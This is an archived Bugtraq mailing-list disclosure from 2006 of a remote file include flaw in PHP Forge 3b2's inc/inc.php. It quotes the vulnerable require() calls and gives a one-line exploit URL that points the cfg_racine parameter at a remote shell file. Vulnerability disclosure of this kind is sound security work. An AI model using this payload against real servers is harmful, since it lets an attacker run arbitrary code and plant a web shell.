PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
Date: Sun, 15 Oct 2006 00:05:30 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############

Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############

Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############

Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############

Discoverd By :  Mahmood_ali
Conatact :      mah_k_2000@xxxxxxxxxxx
############

Special Greetings :_ Tryag-Team
############

bugtraq@xxxxxxxxxxxxxxxxx

submit@xxxxxxxxxxx

_________________________________________________________________

The new Windows Live Toolbar helps you guard against viruseshttp://toolbar.live.com/?mkt=en-gb

Prev by Date: Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux
Next by Date: Advisory 10/2006: ViewVC Undefined Charset UTF-7 XSS Vulnerability
Previous by thread: Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux
Next by thread: Advisory 10/2006: ViewVC Undefined Charset UTF-7 XSS Vulnerability
Index(es):
- Date
- Thread